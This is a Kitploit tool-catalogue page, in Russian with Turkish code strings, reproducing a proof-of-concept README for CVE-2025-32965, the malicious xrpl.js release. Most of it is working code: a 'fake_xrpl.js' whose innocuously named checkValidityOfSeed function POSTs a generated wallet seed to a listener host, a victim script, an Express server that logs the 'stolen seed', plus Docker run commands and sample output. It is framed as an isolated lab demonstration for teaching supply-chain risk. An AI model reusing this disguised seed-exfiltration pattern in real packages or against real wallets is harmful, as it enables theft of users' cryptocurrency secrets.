Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32965-xrpl-js-poc — CVE Kodu: CVE-2025-32965 Zafiyet Türü: Supply Chain Attack (CWE-506: Embedded Malicious Code) Hedef: xrpl.js kütüphanesinin 4.2.1–4.2.4 ve 2.14.2 versiyonları Etki: Kullanıcının cüzdan seed/secret verisinin saldırgana gönderilmesi | Kitploit
Инструменты/GitHubGitHub/yusufdalbudak/cve-2025-32965-xrpl-js-poc
Анализ уязвимостейЭксплуатацияЭксфильтрация данныхАнализ вредоносных программБезопасность Цепочки ПоставокОбучение и Образование
GitHubyusufdalbudak/cve-2025-32965-xrpl-js-poc

CVE-2025-32965-xrpl-js-poc

CVE Kodu: CVE-2025-32965 Zafiyet Türü: Supply Chain Attack (CWE-506: Embedded Malicious Code) Hedef: xrpl.js kütüphanesinin 4.2.1–4.2.4 ve 2.14.2 versiyonları Etki: Kullanıcının cüzdan seed/secret verisinin saldırgana gönderilmesi

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

CVE-2025-32965 — Отчет PoC об атаке на цепочку поставок xrpl.js

Описание уязвимости

  • Код CVE: CVE-2025-32965
  • Тип уязвимости: Атака на цепочку поставок (CWE-506: встроенный вредоносный код)
  • Цель: версии 4.2.1–4.2.4 и 2.14.2 библиотеки xrpl.js
  • Воздействие: отправка данных seed/secret кошелька пользователя атакующему

Цель

Данный PoC предназначен для демонстрации в изолированной среде того, как вредоносная версия xrpl.js может выполнять эксфильтрацию seed (утечку).

Структура среды

  • Платформа: Docker (Ubuntu на базе WSL)
  • Сеть: частная сеть Docker с именем xrplnet
  • Контейнеры:
    • poc-listener: сервер атакующего, собирающий seed-данные
    • xrpl-poc: PoC-контейнер с тестовыми скриптами жертвы

Используемые файлы

package.json:

root@kitploit:~
{
  "name": "xrpl-poc",
  "version": "1.0.0",
  "main": "test.js",
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "xrpl": "^2.7.1"
  }
}

Dockerfile:

root@kitploit:~
FROM node:20
WORKDIR /app
COPY . .
RUN npm install
CMD [ "node", "test.js" ]

fake_xrpl.js:

root@kitploit:~
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "r3v3r5e-poc"
    }
  });
  console.log(" Seed gönderildi:", seed);
}

module.exports = { checkValidityOfSeed };

test.js:

root@kitploit:~
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")

const wallet = xrpl.Wallet.generate()
console.log("  Oluşturulan cüzdan:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)

checkValidityOfSeed(wallet.seed)

server.js:

root@kitploit:~
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log("  Çalınan SEED =>", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener aktif: http://poc-listener:3000/xcm")
})

Шаги

  1. Сборка Docker:
root@kitploit:~
docker build -t xrpl-poc .
docker network create xrplnet
  1. Запуск Listener:
root@kitploit:~
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
  1. Отправка seed жертвой:
root@kitploit:~
docker run -it --rm --network xrplnet xrpl-poc node test.js

Пример вывода

Терминал жертвы:

root@kitploit:~
  Oluşturulan cüzdan:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
  Seed gönderildi: sEd79cMs56cynRVYoXVkk1pn8uYcVqr

Терминал атакующего:

root@kitploit:~
  Listener aktif: http://poc-listener:3000/xcm
  Çalınan SEED => sEd79cMs56cynRVYoXVkk1pn8uYcVqr

Заключение

Данный PoC продемонстрировал, как уязвимость CVE-2025-32965 может быть использована на практике. Код эксфильтрации seed вредоносной библиотеки xrpl.js был успешно запущен в изолированной тестовой среде, и данные были переданы на сервер атакующего.

Рекомендуемая структура GitHub-репозитория

root@kitploit:~
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md

Подготовил: Yusuf Dalbudak
Тестовая среда: WSL2 + Docker + Node.js v20

Скачать инструмент